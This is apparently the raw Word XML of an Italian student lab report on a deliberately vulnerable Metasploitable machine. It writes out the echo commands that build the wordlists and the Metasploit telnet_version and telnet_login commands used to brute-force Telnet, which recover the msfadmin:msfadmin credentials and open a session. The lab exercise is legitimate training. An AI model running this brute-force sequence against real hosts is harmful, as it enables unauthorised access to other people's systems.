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C6C8A3" w14:textId="35002F6E" w:rsidR="008040DD" w:rsidRPr="00794A1F" w:rsidRDefault="008040DD" w:rsidP="008040DD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00794A1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Report dell'Esercizio di Utilizzo di Metasploit per Sfruttare la Vulnerabilità Telnet su Metasploitable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320BD68E" w14:textId="77777777" w:rsidR="008040DD" w:rsidRDefault="008040DD" w:rsidP="008040DD"/>
    <w:p w14:paraId="0B32C80D" w14:textId="77777777" w:rsidR="008040DD" w:rsidRDefault="008040DD" w:rsidP="008040DD">
      <w:r>
        <w:t>In questo esercizio, ho utilizzato Metasploit per sfruttare la vulnerabilità Telnet sulla macchina Metasploitable. Seguo gli step visti in lezione teorica configurando l'IP della mia macchina Kali a 192.168.1.25 e l'IP della mia macchina Metasploitable a 192.168.1.40.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07AA39B4" w14:textId="27A5343D" w:rsidR="008040DD" w:rsidRPr="00794A1F" w:rsidRDefault="00794A1F" w:rsidP="008040DD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00794A1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07D1DA83" wp14:editId="10B00C70">
            <wp:extent cx="5731510" cy="2055495"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:docPr id="101840480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04807" name="Immagine 1" descr="Immagine che contiene testo, schermata, design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6457" w14:textId="354A76DD" w:rsidR="008040DD" w:rsidRPr="00794A1F" w:rsidRDefault="008040DD" w:rsidP="008040DD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00794A1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:r w:rsidR="00794A1F" w:rsidRPr="00794A1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00794A1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>: Creazione dei File di Utenti e Password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143A2F0E" w14:textId="0816494A" w:rsidR="008040DD" w:rsidRDefault="008040DD" w:rsidP="008040DD">
      <w:r>
        <w:t>Ho creato due file: `users.txt` e `passwords.txt`</w:t>
      </w:r>
      <w:r w:rsidR="005A5967">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172BF093" w14:textId="5A5DD234" w:rsidR="008040DD" w:rsidRDefault="005A5967" w:rsidP="008040DD">
      <w:r w:rsidRPr="00645FD4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C560641" wp14:editId="73B47C19">
            <wp:extent cx="5731510" cy="1454150"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1386082430" name="Immagine 1" descr="Immagine che contiene testo, Software multimedial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79330" name="Immagine 1" descr="Immagine che contiene testo, Software multimediale, schermat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8E4E" w14:textId="77777777" w:rsidR="008040DD" w:rsidRDefault="008040DD" w:rsidP="008040DD"/>
    <w:p w14:paraId="33D13DFF" w14:textId="44504C0C" w:rsidR="008040DD" w:rsidRDefault="008040DD" w:rsidP="008040DD">
      <w:r>
        <w:t xml:space="preserve">Ho usato i comandi </w:t>
      </w:r>
      <w:r w:rsidR="00DD15D0">
        <w:t>‘</w:t>
      </w:r>
      <w:r>
        <w:t>echo</w:t>
      </w:r>
      <w:r w:rsidR="00DD15D0">
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> per inserire i dati nei file e li ho salvati nella directory </w:t>
      </w:r>
      <w:r w:rsidR="00DD15D0">
        <w:t>‘</w:t>
      </w:r>
      <w:r>
        <w:t>/tmp</w:t>
      </w:r>
      <w:r w:rsidR="00DD15D0">
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D443C8B" w14:textId="77777777" w:rsidR="008040DD" w:rsidRDefault="008040DD" w:rsidP="008040DD"/>
    <w:p w14:paraId="3DD3A9B1" w14:textId="3153AE35" w:rsidR="008040DD" w:rsidRPr="008040DD" w:rsidRDefault="00794A1F" w:rsidP="008040DD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C21B540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echo -e "admin\nuser\nroot\nguest\nmsfadmin" &gt; /tmp/users.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3433632B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echo -e "password\n123456\nadmin\nguest\nmsfadmin\nroot" &gt; /tmp/passwords.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32703978" w14:textId="07916C8A" w:rsidR="008040DD" w:rsidRDefault="00794A1F" w:rsidP="008040DD">
      <w:r>
        <w:t>“</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16598A10" w14:textId="77777777" w:rsidR="008040DD" w:rsidRDefault="008040DD" w:rsidP="008040DD"/>
    <w:p w14:paraId="041236A6" w14:textId="31A397B3" w:rsidR="008040DD" w:rsidRPr="00794A1F" w:rsidRDefault="008040DD" w:rsidP="008040DD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00794A1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> Step </w:t>
      </w:r>
      <w:r w:rsidR="00794A1F" w:rsidRPr="00794A1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00794A1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>: Avvio di Metasploit e Utilizzo del Modulo Telnet Version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C71F93" w14:textId="5D654957" w:rsidR="008040DD" w:rsidRDefault="008040DD" w:rsidP="008040DD">
      <w:r>
        <w:t xml:space="preserve">Ho avviato Metasploit con il comando </w:t>
      </w:r>
      <w:r w:rsidR="00794A1F">
        <w:t>‘</w:t>
      </w:r>
      <w:r>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:r w:rsidR="00794A1F">
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Poi, ho caricato il modulo </w:t>
      </w:r>
      <w:r w:rsidR="00794A1F">
        <w:t>‘</w:t>
      </w:r>
      <w:r>
        <w:t>auxiliary/scanner/telnet/telnet_version</w:t>
      </w:r>
      <w:r w:rsidR="00794A1F">
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> per verificare la versione del servizio Telnet sulla macchina Metasploitable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A88339" w14:textId="48BEFAF2" w:rsidR="005A5967" w:rsidRDefault="005A5967" w:rsidP="008040DD">
      <w:r w:rsidRPr="00645FD4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61ADFC90" wp14:editId="38DB8E5D">
            <wp:extent cx="5731510" cy="3710305"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:docPr id="7939361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01155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16C0" w14:textId="77777777" w:rsidR="008040DD" w:rsidRDefault="008040DD" w:rsidP="008040DD"/>
    <w:p w14:paraId="325CC77A" w14:textId="60120335" w:rsidR="008040DD" w:rsidRPr="008040DD" w:rsidRDefault="00794A1F" w:rsidP="008040DD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5D5363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msf &gt; use auxiliary/scanner/telnet/telnet_version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1354BC0F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msf auxiliary(scanner/telnet/telnet_version) &gt; set RHOSTS 192.168.1.40</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BF3CAE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msf auxiliary(scanner/telnet/telnet_version) &gt; exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27879FA7" w14:textId="789581AE" w:rsidR="008040DD" w:rsidRDefault="00794A1F" w:rsidP="008040DD">
      <w:r>
        <w:t>“</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1904853D" w14:textId="77777777" w:rsidR="008040DD" w:rsidRDefault="008040DD" w:rsidP="008040DD"/>
    <w:p w14:paraId="3CBFDDED" w14:textId="77777777" w:rsidR="00153BD0" w:rsidRDefault="00153BD0" w:rsidP="008040DD"/>
    <w:p w14:paraId="66E7E524" w14:textId="77777777" w:rsidR="00153BD0" w:rsidRDefault="00153BD0" w:rsidP="008040DD"/>
    <w:p w14:paraId="02B7EA12" w14:textId="77777777" w:rsidR="00153BD0" w:rsidRDefault="00153BD0" w:rsidP="008040DD"/>
    <w:p w14:paraId="39458F61" w14:textId="77777777" w:rsidR="00153BD0" w:rsidRDefault="00153BD0" w:rsidP="008040DD"/>
    <w:p w14:paraId="04DCF1DC" w14:textId="77777777" w:rsidR="00153BD0" w:rsidRDefault="00153BD0" w:rsidP="008040DD"/>
    <w:p w14:paraId="5DC9B75B" w14:textId="2B373819" w:rsidR="00794A1F" w:rsidRDefault="008040DD" w:rsidP="008040DD">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Il modulo ha identificato correttamente il servizio Telnet in esecuzione sulla macchina di destinazione.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB96B39" w14:textId="06CF67B1" w:rsidR="008040DD" w:rsidRPr="00794A1F" w:rsidRDefault="008040DD" w:rsidP="008040DD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00794A1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:r w:rsidR="00794A1F" w:rsidRPr="00794A1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00794A1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>: Utilizzo del Modulo Telnet Login per Forzare l'Accesso</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565338C1" w14:textId="0913CB50" w:rsidR="008040DD" w:rsidRDefault="008040DD" w:rsidP="008040DD">
      <w:r>
        <w:t xml:space="preserve">Ho utilizzato il modulo </w:t>
      </w:r>
      <w:r w:rsidR="00794A1F">
        <w:t>‘</w:t>
      </w:r>
      <w:r>
        <w:t>auxiliary/scanner/telnet/telnet_login</w:t>
      </w:r>
      <w:r w:rsidR="00794A1F">
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> per tentare un attacco di forza bruta contro il servizio Telnet sulla macchina Metasploitable. Ho configurato il modulo per usare i file di utenti e password creati in precedenza.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B53627" w14:textId="3E8541F3" w:rsidR="008040DD" w:rsidRDefault="005A5967" w:rsidP="008040DD">
      <w:r w:rsidRPr="00645FD4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="193FCDDD" wp14:editId="4C55F45C">
            <wp:extent cx="5731510" cy="3353435"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="2118230103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35118" name="Immagine 1" descr="Immagine che contiene testo, schermata, Carattere, menu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618B" w14:textId="3D80FEF9" w:rsidR="008040DD" w:rsidRPr="008040DD" w:rsidRDefault="00794A1F" w:rsidP="008040DD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7409D022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msf &gt; use auxiliary/scanner/telnet/telnet_login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3782A2DC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msf auxiliary(scanner/telnet/telnet_login) &gt; set RHOSTS 192.168.1.40</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29AEAB2A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msf auxiliary(scanner/telnet/telnet_login) &gt; set USER_FILE /tmp/users.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE92A8C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msf auxiliary(scanner/telnet/telnet_login) &gt; set PASS_FILE /tmp/passwords.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081210DC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msf auxiliary(scanner/telnet/telnet_login) &gt; exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381D6CCA" w14:textId="41E2D3A6" w:rsidR="008040DD" w:rsidRDefault="00794A1F" w:rsidP="008040DD">
      <w:r>
        <w:t>“</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE342F2" w14:textId="77777777" w:rsidR="008040DD" w:rsidRDefault="008040DD" w:rsidP="008040DD"/>
    <w:p w14:paraId="388C1548" w14:textId="6BCD0248" w:rsidR="008040DD" w:rsidRDefault="008040DD" w:rsidP="008040DD">
      <w:r>
        <w:t xml:space="preserve">Il modulo ha tentato diverse combinazioni di utenti e password, riuscendo infine a trovare le credenziali corrette </w:t>
      </w:r>
      <w:r w:rsidR="00794A1F">
        <w:t>‘</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>msfadmin:msfadmin</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00794A1F">
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71193D0D" w14:textId="77777777" w:rsidR="008040DD" w:rsidRDefault="008040DD" w:rsidP="008040DD"/>
    <w:p w14:paraId="6011C818" w14:textId="77777777" w:rsidR="00794A1F" w:rsidRDefault="00794A1F" w:rsidP="008040DD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A8B5042" w14:textId="77777777" w:rsidR="00794A1F" w:rsidRDefault="00794A1F" w:rsidP="008040DD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FC14CB5" w14:textId="77777777" w:rsidR="00794A1F" w:rsidRDefault="00794A1F" w:rsidP="008040DD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70480A04" w14:textId="3D92B1F1" w:rsidR="008040DD" w:rsidRPr="00794A1F" w:rsidRDefault="008040DD" w:rsidP="008040DD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00794A1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:r w:rsidR="00794A1F" w:rsidRPr="00794A1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00794A1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>: Stabilire una Sessione con la Macchina Metasploitable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B523AE" w14:textId="77777777" w:rsidR="008040DD" w:rsidRDefault="008040DD" w:rsidP="008040DD">
      <w:r>
        <w:t>Una volta ottenute le credenziali corrette, ho stabilito una sessione Telnet con la macchina Metasploitable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E26972A" w14:textId="211ACA25" w:rsidR="008040DD" w:rsidRDefault="005A5967" w:rsidP="008040DD">
      <w:r w:rsidRPr="00CC2362">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1BC9BF91" wp14:editId="2187517A">
            <wp:extent cx="5731510" cy="4993005"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1972470254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25573" name="Immagine 1" descr="Immagine che contiene testo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EEA3" w14:textId="4C545B2A" w:rsidR="008040DD" w:rsidRPr="008040DD" w:rsidRDefault="00794A1F" w:rsidP="008040DD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38ACCEE3" w14:textId="77777777" w:rsidR="008040DD" w:rsidRPr="008040DD" w:rsidRDefault="008040DD" w:rsidP="008040DD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008040DD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>msf auxiliary(scanner/telnet/telnet_login) &gt; sessions -i 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5889B4FA" w14:textId="2DD3D538" w:rsidR="008040DD" w:rsidRDefault="00794A1F" w:rsidP="008040DD">
      <w:r>
        <w:t>“</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F0C4D8" w14:textId="55980420" w:rsidR="008040DD" w:rsidRDefault="005A5967" w:rsidP="008040DD">
      <w:r w:rsidRPr="00CC2362">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43E32202" wp14:editId="71FDC1C9">
            <wp:extent cx="5731510" cy="5168900"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="88275830" name="Immagine 1" descr="Immagine che contiene testo, schermata, menu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38414" name="Immagine 1" descr="Immagine che contiene testo, schermata, menu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6D21" w14:textId="77777777" w:rsidR="008040DD" w:rsidRDefault="008040DD" w:rsidP="008040DD">
      <w:r>
        <w:t>All'interno della sessione, ho eseguito alcuni comandi per verificare l'accesso e raccogliere informazioni sul sistema:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F46A59" w14:textId="77777777" w:rsidR="00794A1F" w:rsidRDefault="00794A1F" w:rsidP="008040DD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B96E50" w14:textId="2317BE83" w:rsidR="008040DD" w:rsidRPr="00794A1F" w:rsidRDefault="008040DD" w:rsidP="008040DD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>ps aux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC9E507" w14:textId="77777777" w:rsidR="008040DD" w:rsidRDefault="008040DD" w:rsidP="008040DD">
      <w:r>
        <w:t>ifconfig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6421F3" w14:textId="22932E61" w:rsidR="008040DD" w:rsidRDefault="00794A1F" w:rsidP="008040DD">
      <w:r>
        <w:t>“</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69949567" w14:textId="7A8010A7" w:rsidR="008040DD" w:rsidRPr="00794A1F" w:rsidRDefault="008040DD" w:rsidP="008040DD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00794A1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Risultati</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04346D1C" w14:textId="77777777" w:rsidR="008040DD" w:rsidRDefault="008040DD" w:rsidP="008040DD">
      <w:r>
        <w:t>Ho confermato che il sistema era una vecchia versione di Linux, con vari servizi in esecuzione. La configurazione della rete e l'output dei processi attivi erano come previsto per una macchina vulnerabile Metasploitable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4A72BB" w14:textId="77777777" w:rsidR="008040DD" w:rsidRDefault="008040DD" w:rsidP="008040DD"/>
    <w:p w14:paraId="4813B130" w14:textId="1C693EDA" w:rsidR="00794A1F" w:rsidRDefault="008040DD" w:rsidP="008040DD">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2018923B" w14:textId="77777777" w:rsidR="00645FD4" w:rsidRDefault="00645FD4"/>
    <w:p w14:paraId="6996602F" w14:textId="77777777" w:rsidR="00645FD4" w:rsidRDefault="00645FD4"/>
    <w:sectPr w:rsidR="00645F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FD4"/>
    <w:rsid w:val="00153BD0"/>
    <w:rsid w:val="00307FB0"/>
    <w:rsid w:val="005A5967"/>
    <w:rsid w:val="00645FD4"/>
    <w:rsid w:val="00794A1F"/>
    <w:rsid w:val="008040DD"/>
    <w:rsid w:val="00A815C2"/>
    <w:rsid w:val="00CC2362"/>
    <w:rsid w:val="00DD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6558F"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{79FAC088-C5F0-413F-9127-528A53C32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45F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45F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45F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45F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45F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45F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45F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45F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45F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45F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45F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45F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45FD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45FD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45FD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45FD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45FD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45FD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45F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45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45F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45F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45F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45FD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45FD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45FD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45F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45FD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45F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5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-05-20T13:03:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-05-21T11:50:00Z</dcterms:modified>
</cp:coreProperties>
</file>